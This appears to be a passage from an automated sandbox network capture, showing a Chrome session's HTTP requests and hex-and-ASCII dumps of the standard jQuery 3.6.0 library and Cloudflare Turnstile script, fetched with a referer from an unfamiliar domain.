                                                            2025-01-07 19:24:56 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                            2025-01-07 19:24:56 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                            Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                            2025-01-07 19:24:56 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                            Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                            2025-01-07 19:24:56 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                            Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                            2025-01-07 19:24:56 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                            Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                            2025-01-07 19:24:56 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                            Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                            2025-01-07 19:24:56 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                            Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                            2025-01-07 19:24:56 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                            Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                            2025-01-07 19:24:56 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                            Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                            2025-01-07 19:24:56 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                            Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.849721104.18.94.414435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:24:56 UTC649OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://brh5.bughtswo.com/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:24:56 UTC386INHTTP/1.1 302 Found
                                                            Date: Tue, 07 Jan 2025 19:24:56 GMT
                                                            Content-Length: 0
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                            cross-origin-resource-policy: cross-origin
                                                            location: /turnstile/v0/g/849bfe45bf45/api.js
                                                            Server: cloudflare
                                                            CF-RAY: 8fe654b3982a42b3-EWR
                                                            alt-svc: h3=":443"; ma=86400


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.849723104.18.94.414435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:24:56 UTC648OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://brh5.bughtswo.com/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:24:56 UTC471INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 19:24:56 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 47521
                                                            Connection: close
                                                            accept-ranges: bytes
                                                            last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                            access-control-allow-origin: *
                                                            cross-origin-resource-policy: cross-origin
                                                            Server: cloudflare
                                                            CF-RAY: 8fe654b76a5219c7-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 19:24:56 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                            Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                            2025-01-07 19:24:56 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                            Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                            2025-01-07 19:24:56 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                            2025-01-07 19:24:56 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                            2025-01-07 19:24:56 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                            Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                            2025-01-07 19:24:56 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                            Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                            2025-01-07 19:24:56 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                            Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
